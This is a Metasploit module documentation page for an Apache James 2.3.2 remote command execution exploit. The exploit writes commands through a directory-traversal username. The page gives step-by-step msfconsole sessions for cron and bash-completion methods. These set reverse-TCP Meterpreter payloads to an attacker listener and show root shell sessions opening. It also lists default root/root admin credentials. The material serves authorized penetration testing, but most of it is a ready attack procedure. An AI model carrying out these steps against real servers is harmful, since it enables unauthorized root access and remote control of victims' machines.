metasploit-gs/documentation/modules/exploit/linux/smtp/apache_james_exec.md

## Vulnerable Application
  This module exploits a vulnerability that exists due to a lack of input validation when creating a user in Apache James 2.3.2.
  By creating a user with a directory traversal payload as the username, commands can be written to a given directory/file.
  Instructions for installing the vulnerable application for testing can be found here:
  https://www.exploit-db.com/docs/english/40123-exploiting-apache-james-server-2.3.2.pdf

## Verification Steps
  __1.__ Start msfconsole

  __2.__ DO: Load module exploit/linux/smtp/apache_james_exec

  __3.__ DO: Set the remote and local options: rhosts, lhosts, lport

  __4.__ DO: Set the preferred payload

  __5.__ DO: Run the check method to determine vulnerability

  __6.__ DO: Run the exploit

  __7.__ The payload will connect to the listener if the exploit is successful

## Options
  **USERNAME:**  The administrator username for Apache James 2.3.2 remote administration tool. By default this is 'root'.

  **PASSWORD:**  The administrator password for Apache James 2.3.2 remote administration tool. By default this is 'root'.

  **ADMINPORT:**  The port for Apache James 2.3.2 remote administration tool. By default this is '4555'.

  **RHOSTS:**  The IP address of the vulnerable server.

  **RPORT:**  The port number of the SMTP service.

  **POP3PORT** The port for the POP3 Apache James Service.  By default this '110'.

## Scenarios
  **If using Cron exploitation method:** This method allows for automatic execution of the payload with no user interaction
  required and gives the attacker root privileges. It will also attempt to automatically cleanup the malicious user and the
  mail objects.

  __1.__ Load the module:

```
  msf5 > use exploit/linux/smtp/apache_james_exec
```

  __2.__ Set remote and local options:

```
  msf5 exploit(linux/smtp/apache_james_exec) > set target 1
  target => 1
  msf5 exploit(linux/smtp/apache_james_exec) > set rhosts  192.168.224.169
  rhosts =>  192.168.224.169

  msf5 exploit(linux/smtp/apache_james_exec) > set lhost 192.168.224.167
  lhost => 192.168.224.167
  msf5 exploit(linux/smtp/apache_james_exec) > set lport 4444
  lport => 4444
```

  __3.__ Set payload:

```
  msf5 exploit(linux/smtp/apache_james_exec) > set payload linux/x64/meterpreter/reverse_tcp
  payload => linux/x64/meterpreter/reverse_tcp
```

  __4.__ Check version and run exploit:

```
  msf5 exploit(linux/smtp/apache_james_exec) > check
  [*] 192.168.224.164:25 - The target appears to be vulnerable.
  msf5 exploit(linux/smtp/apache_james_exec) > exploit
  
  [*] Started reverse TCP handler on 192.168.224.167:4444
  [+] 192.168.224.169:25 - Waiting 60 seconds for cron to execute payload
  [*] Sending stage (3021284 bytes) to 192.168.224.169
  [*] Meterpreter session 1 opened (192.168.224.167:4444 -> 192.168.224.169:38694) at 2020-02-02 16:30:02 -0800
  [*] 192.168.224.169:25 - Command Stager progress - 100.00% done (812/812 bytes)

  meterpreter >
```

  ---------------------------------------------------------------------------------------------
  **If using Bash Completion:** This method may be preferable if targeting a linux operating system such as some versions of Ubuntu that
  fails to run the cron method for exploitation. This exploitation method will leave an Apache James mail object artifact in the
  /etc/bash_completion.d directory and the malicious user account.

  __1.__ Load the module:

```
  msf5 > use exploit/linux/smtp/apache_james_exec
```

  __2.__ Set remote and local options:

```
  msf5 exploit(linux/smtp/apache_james_exec) > set target 0
  target => 0
  msf5 exploit(linux/smtp/apache_james_exec) > set rhosts 192.168.224.164
  rhosts => 192.168.224.164

  msf5 exploit(linux/smtp/apache_james_exec) > set lhost 192.168.224.167
  lhost => 192.168.224.167
  msf5 exploit(linux/smtp/apache_james_exec) > set lport 4444
  lport => 4444
```

  __3.__ Set payload:

```
  msf5 exploit(linux/smtp/apache_james_exec) > set payload linux/x64/meterpreter/reverse_tcp
  payload => linux/x64/meterpreter/reverse_tcp
```

  __4.__ Check version and run exploit:

```
  msf5 exploit(linux/smtp/apache_james_exec) > check
  [*] 192.168.224.164:25 - The target appears to be vulnerable.
  msf5 exploit(linux/smtp/apache_james_exec) > exploit

  [*] 192.168.224.164:25 - Command Stager progress - 100.00% done (812/812 bytes)
```

  __5.__ Set up and run listener (Can be done before running exploit):

```
  msf5 exploit(linux/smtp/apache_james_exec) > use exploit/multi/handler
  msf5 exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcp
  payload => linux/x64/meterpreter/reverse_tcp
  msf5 exploit(multi/handler) > set lport 4444
  lport => 4444
  msf5 exploit(multi/handler) > set lhost 192.168.224.167
  lhost => 192.168.224.167

  msf5 exploit(multi/handler) > run

  [*] Started reverse TCP handler on 192.168.224.167:4444
  [*] Sending stage (3021284 bytes) to 192.168.224.164
  [*] Meterpreter session 1 opened (192.168.224.167:4444 -> 192.168.224.164:34752) at 2020-01-18 18:25:14 -0800

  meterpreter >
```

## Targets
```
  Id  Name 
  --  ----
  0   Bash Completion
  1   Cron
```

## References
  1. <https://www.exploit-db.com/exploits/35513>
  2. <https://www.exploit-db.com/docs/english/40123-exploiting-apache-james-server-2.3.2.pdf>